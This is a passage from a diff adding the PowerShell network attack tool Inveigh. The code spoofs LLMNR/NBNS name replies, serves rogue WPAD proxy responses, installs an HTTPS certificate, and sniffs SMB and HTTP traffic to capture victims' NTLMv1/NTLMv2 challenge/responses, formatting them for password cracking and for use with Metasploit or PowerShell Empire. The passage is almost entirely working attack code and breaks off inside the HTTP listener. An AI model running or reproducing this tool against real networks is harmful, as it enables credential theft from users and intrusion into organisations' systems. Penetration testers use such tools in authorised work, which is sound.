+1. An elevated administrator or SYSTEM shell is needed.
+2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.
+3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
+4. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
+5. HTTP challenge/response captures are performed with a dedicated listener.
+6. The local LLMNR/NBNS services do not need to be disabled on the host system.
+7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
+9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
+10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+# Parameter default values can be modified in this section: 
+[CmdletBinding()]
+param
+( 
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
+    [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+    [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+    [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
+    [parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
+    [parameter(Mandatory=$false)][Int]$WPADPort = "",
+    [parameter(Mandatory=$false)][Int]$RunTime = "",
+    [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
+    [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
+    [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
+    [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
+    [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "",
+    [parameter(Mandatory=$false)][String]$HTTPResponse = "",
+    [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
+    [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+    [parameter(Mandatory=$false)][String]$WPADResponse = "",
+    [parameter(Mandatory=$false)][Switch]$Inspect,
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module."
+}
+
+if(!$IP)
+{ 
+    $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+}
+
+if(!$SpooferIP)
+{
+    $SpooferIP = $IP  
+}
+
+if($HTTPDefaultFile -or $HTTPDefaultEXE)
+{
+
+    if(!$HTTPDir)
+    {
+        throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+    }
+
+}
+
+if($WPADIP -or $WPADPort)
+{
+
+    if(!$WPADIP)
+    {
+        throw "You must specify a -WPADPort to go with -WPADIP"
+    }
+
+    if(!$WPADPort)
+    {
+        throw "You must specify a -WPADIP to go with -WPADPort"
+    }
+
+}
+
+if(!$OutputDir)
+{ 
+    $output_directory = $PWD.Path
+}
+else
+{
+    $output_directory = $OutputDir
+}
+
+if(!$inveigh)
+{
+    $global:inveigh = [HashTable]::Synchronized(@{})
+    $inveigh.log = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
+    $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+}
+
+if($inveigh.running)
+{
+    throw "Invoke-Inveigh is already running, use Stop-Inveigh"
+}
+
+$inveigh.sniffer_socket = $null
+
+if($inveigh.HTTP_listener.IsListening -and !$inveigh.relay_running)
+{
+    $inveigh.HTTP_listener.Stop()
+    $inveigh.HTTP_listener.Close()
+}
+
+if(!$inveigh.relay_running -or !$inveigh.unprivileged_running)
+{
+    $inveigh.console_queue = New-Object System.Collections.ArrayList
+    $inveigh.status_queue = New-Object System.Collections.ArrayList
+    $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+    $inveigh.certificate_application_ID = $HTTPSCertAppID
+    $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
+    $inveigh.console_output = $false
+    $inveigh.console_input = $true
+    $inveigh.file_output = $false
+    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+}
+
+$inveigh.running = $true
+
+if($StatusOutput -eq 'Y')
+{
+    $inveigh.status_output = $true
+}
+else
+{
+    $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+    $inveigh.output_stream_only = $true
+}
+else
+{
+    $inveigh.output_stream_only = $false
+}
+
+if($Inspect)
+{
+    $LLMNR = "N"
+    $NBNS = "N"
+    $HTTP = "N"
+    $HTTPS = "N"
+    $SMB = "N"
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+    $inveigh.tool = 1
+    $inveigh.output_stream_only = $true
+    $inveigh.newline = ""
+    $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+    $inveigh.tool = 2
+    $inveigh.output_stream_only = $true
+    $inveigh.console_input = $false
+    $inveigh.newline = "`n"
+    $ConsoleOutput = "Y"
+    $ShowHelp = "N"
+}
+else
+{
+    $inveigh.tool = 0
+    $inveigh.newline = ""
+}
+
+# Write startup messages
+$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')")  > $null
+$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+
+if($StartupChecks -eq 'Y')
+{
+    $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
+
+if($firewall_status)
+{
+    $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+    $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+    $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+    if($firewall_powershell)
+    {
+        $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed")  > $null
+    }
+
+}
+
+$inveigh.status_queue.Add("Listening IP Address = $IP")  > $null
+$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")  > $null
+
+if($LLMNR -eq 'Y')
+{
+    $inveigh.status_queue.Add("LLMNR Spoofer = Enabled")  > $null
+    $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds")  > $null
+    $LLMNR_response_message = "- response sent"
+}
+else
+{
+    $inveigh.status_queue.Add("LLMNR Spoofer = Disabled")  > $null
+    $LLMNR_response_message = "- LLMNR spoofer is disabled"
+}
+
+if($NBNS -eq 'Y')
+{
+    $NBNSTypes_output = $NBNSTypes -join ","
+    
+    if($NBNSTypes.Count -eq 1)
+    {
+        $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled")  > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled")  > $null
+    }
+
+    $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds")  > $null
+    $NBNS_response_message = "- response sent"
+}
+else
+{
+    $inveigh.status_queue.Add("NBNS Spoofer = Disabled")  > $null
+    $NBNS_response_message = "- NBNS spoofer is disabled"
+}
+
+if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Learning = Enabled")  > $null
+
+    if($SpooferLearningDelay -eq 1)
+    {
+        $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute")  > $null
+    }
+    elseif($SpooferLearningDelay -gt 1)
+    {
+        $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes")  > $null
+    }
+    
+    if($SpooferLearningInterval -eq 1)
+    {
+        $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute")  > $null
+    }
+    elseif($SpooferLearningInterval -eq 0)
+    {
+        $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled")  > $null
+    }
+    elseif($SpooferLearningInterval -gt 1)
+    {
+        $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes")  > $null
+    }
+
+}
+
+if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ","))  > $null
+}
+
+if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ","))  > $null
+}
+
+if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ","))  > $null
+}
+
+if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ","))  > $null
+}
+
+if($SpooferRepeat -eq 'N')
+{
+    $inveigh.spoofer_repeat = $false
+    $inveigh.status_queue.Add("Spoofer Repeating = Disabled")  > $null
+}
+else
+{
+    $inveigh.spoofer_repeat = $true
+}
+
+if($SMB -eq 'Y')
+{
+    $inveigh.status_queue.Add("SMB Capture = Enabled")  > $null
+}
+else
+{
+    $inveigh.status_queue.Add("SMB Capture = Disabled")  > $null
+}
+
+if($HTTP -eq 'Y')
+{
+    
+    if($StartupChecks -eq 'Y')
+    {
+        $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":80 "
+    }
+
+    if($HTTP_port_check)
+    {
+        $inveigh.HTTP = $false
+        $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80")  > $null
+    }
+    else
+    {
+        $inveigh.HTTP = $true
+        $inveigh.status_queue.Add("HTTP Capture = Enabled")  > $null
+    }
+
+}
+else
+{
+    $inveigh.HTTP = $false
+    $inveigh.status_queue.Add("HTTP Capture = Disabled")  > $null
+}
+
+if($HTTPS -eq 'Y')
+{
+    
+    if($StartupChecks -eq 'Y')
+    {
+        $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":443 "
+    }
+
+    if($HTTPS_port_check)
+    {
+        $inveigh.HTTPS = $false
+        $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443")  > $null
+    }
+    else
+    {
+
+        try
+        {
+            $inveigh.HTTPS = $true
+            $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+            $certificate_store.Open('ReadWrite')
+            $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
+            $certificate.Import($PWD.Path + "\Inveigh.pfx")
+            $certificate_store.Add($certificate) 
+            $certificate_store.Close()
+            $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
+            $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
+            $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
+            & "netsh" $netsh_arguments > $null
+            $inveigh.status_queue.Add("HTTPS Capture = Enabled")  > $null
+        }
+        catch
+        {
+            $certificate_store.Close()
+            $HTTPS="N"
+            $inveigh.HTTPS = $false
+            $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error")  > $null
+        }
+
+    }
+
+}
+else
+{
+    $inveigh.status_queue.Add("HTTPS Capture = Disabled")  > $null
+}
+
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth")  > $null
+    $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth")  > $null
+
+    if($HTTPDir -and !$HTTPResponse)
+    {
+        $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir")  > $null
+
+        if($HTTPDefaultFile)
+        {
+            $inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile")  > $null
+        }
+
+        if($HTTPDefaultEXE)
+        {
+            $inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE")  > $null
+        }
+
+    }
+
+    if($HTTPResponse)
+    {
+        $inveigh.status_queue.Add("HTTP/HTTPS Custom Response = Enabled")  > $null
+    }
+
+    if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
+    {
+        $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm")  > $null
+    }
+
+    if($WPADIP -and $WPADPort)
+    {
+        $inveigh.status_queue.Add("WPAD Response = Enabled")  > $null
+        $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort")  > $null
+
+        if($WPADDirectHosts)
+        {
+            ForEach($WPAD_direct_host in $WPADDirectHosts)
+            {
+                $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
+            }
+
+            $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+            $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ","))  > $null
+        }
+        else
+        {
+            $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+        }
+
+    }
+    elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
+    {
+        $inveigh.status_queue.Add("WPAD Custom Response = Enabled")  > $null
+        $WPADResponse = $WPADResponse
+    }
+    elseif($WPADEmptyFile -eq 'Y')
+    {
+        $inveigh.status_queue.Add("WPAD Default Response = Enabled")  > $null
+        $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
+    }
+
+    if($Challenge)
+    {
+        $inveigh.status_queue.Add("NTLM Challenge = $Challenge")  > $null
+    }
+
+}
+
+if($MachineAccounts -eq 'N')
+{
+    $inveigh.status_queue.Add("Machine Account Capture = Disabled")  > $null
+    $inveigh.machine_accounts = $false
+}
+else
+{
+    $inveigh.machine_accounts = $true
+}
+
+if($ConsoleOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time Console Output = Enabled")  > $null
+    $inveigh.console_output = $true
+
+    if($ConsoleStatus -eq 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute")  > $null
+    }
+    elseif($ConsoleStatus -gt 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes")  > $null
+    }
+
+}
+else
+{
+
+    if($inveigh.tool -eq 1)
+    {
+        $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection")  > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("Real Time Console Output = Disabled")  > $null
+    }
+
+}
+
+if($ConsoleUnique -eq 'Y')
+{
+    $inveigh.console_unique = $true
+}
+else
+{
+    $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time File Output = Enabled")  > $null
+    $inveigh.status_queue.Add("Output Directory = $output_directory")  > $null
+    $inveigh.file_output = $true
+}
+else
+{
+    $inveigh.status_queue.Add("Real Time File Output = Disabled")  > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+    $inveigh.file_unique = $true
+}
+else
+{
+    $inveigh.file_unique = $false
+}
+
+if($RunTime -eq 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minute")  > $null
+}
+elseif($RunTime -gt 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minutes")  > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+    $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh")  > $null
+        
+    if($inveigh.console_output)
+    {
+        $inveigh.status_queue.Add("Press any key to stop real time console output")  > $null
+    }
+
+}
+
+if($inveigh.status_output)
+{
+
+    while($inveigh.status_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+            $inveigh.status_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -Wildcard ($inveigh.status_queue[0])
+            {
+
+                "* Disabled Due To *"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                "Run Stop-Inveigh to stop Inveigh"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                "Windows Firewall = Enabled"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+
+    }
+
+}
+
+# Begin ScriptBlocks
+
+# Shared Basic Functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+    function DataToUInt16($field)
+    {
+	   [Array]::Reverse($field)
+	   return [System.BitConverter]::ToUInt16($field,0)
+    }
+
+    function DataToUInt32($field)
+    {
+	   [Array]::Reverse($field)
+	   return [System.BitConverter]::ToUInt32($field,0)
+    }
+
+    function DataLength2
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+        return $string_length
+    }
+
+    function DataLength4
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+        return $string_length
+    }
+
+    function DataToString
+    {
+        param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+
+        $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+        $string_data = $string_data -replace "-00",""
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+        return $string_extract
+    }
+
+}
+
+# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
+$SMB_NTLM_functions_scriptblock =
+{
+
+    function SMBNTLMChallenge
+    {
+        param ([Byte[]]$payload_bytes)
+
+        $payload = [System.BitConverter]::ToString($payload_bytes)
+        $payload = $payload -replace "-",""
+        $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+
+        if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+        {
+            $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+        }
+
+        return $NTLM_challenge
+    }
+
+    function SMBNTLMResponse
+    {
+        param ([Byte[]]$payload_bytes)
+
+        $payload = [System.BitConverter]::ToString($payload_bytes)
+        $payload = $payload -replace "-",""
+        $NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000")
+
+        if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
+        {
+            $NTLMSSP_offset = $NTLMSSP_hex_offset / 2
+
+            $LM_length = DataLength2 ($NTLMSSP_offset + 12) $payload_bytes
+            $LM_offset = DataLength4 ($NTLMSSP_offset + 16) $payload_bytes
+            $LM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
+
+            $NTLM_length = DataLength2 ($NTLMSSP_offset + 20) $payload_bytes
+            $NTLM_offset = DataLength4 ($NTLMSSP_offset + 24) $payload_bytes
+            $NTLM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
+
+            $domain_length = DataLength2 ($NTLMSSP_offset + 28) $payload_bytes
+            $domain_offset = DataLength4 ($NTLMSSP_offset + 32) $payload_bytes
+            $NTLM_domain_string = DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $payload_bytes
+
+            $user_length = DataLength2 ($NTLMSSP_offset + 36) $payload_bytes
+            $user_offset = DataLength4 ($NTLMSSP_offset + 40) $payload_bytes
+            $NTLM_user_string = DataToString ($NTLMSSP_offset + $user_offset) $user_length $payload_bytes
+
+            $host_length = DataLength2 ($NTLMSSP_offset + 44) $payload_bytes
+            $host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes
+            $NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes
+
+            if($NTLM_length -gt 24)
+            {
+                $NTLMv2_response = $NTLM_response.Insert(32,':')
+                $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response
+
+                if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
+                {
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
+                    $inveigh.NTLMv2_list.Add($NTLMv2_hash)
+
+                    if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
+                    }
+                    else
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+                    }
+
+                    if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
+                    {
+                        $inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)
+                        $inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                    }
+
+                    if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
+                    {
+                        $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+                    }
+
+                    if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
+                    {
+                        $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+                    }
+
+                }
+
+            }
+            elseif($NTLM_length -eq 24)
+            {
+                $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge
+
+                if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
+                {
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
+                    $inveigh.NTLMv1_list.Add($NTLMv1_hash)
+
+                    if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
+                    }
+                    else
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+                    }
+
+                    if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
+                    {
+                        $inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)
+                        $inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                    }
+
+                    if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
+                    {
+                        $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+                    }
+
+                    if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
+                    {
+                        $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+                    }
+
+                }
+
+            }
+
+        }
+
+    }
+
+}
+
+# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
+$HTTP_scriptblock = 
+{ 
+    param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$WPADAuth,$WPADResponse)
+
+    function NTLMChallengeBase64
+    {
+        param ([String]$Challenge)
+
+        $HTTP_timestamp = Get-Date
+        $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+        if($Challenge)
+        {
+            $HTTP_challenge = $Challenge
+            $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+        else
+        {
+            $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
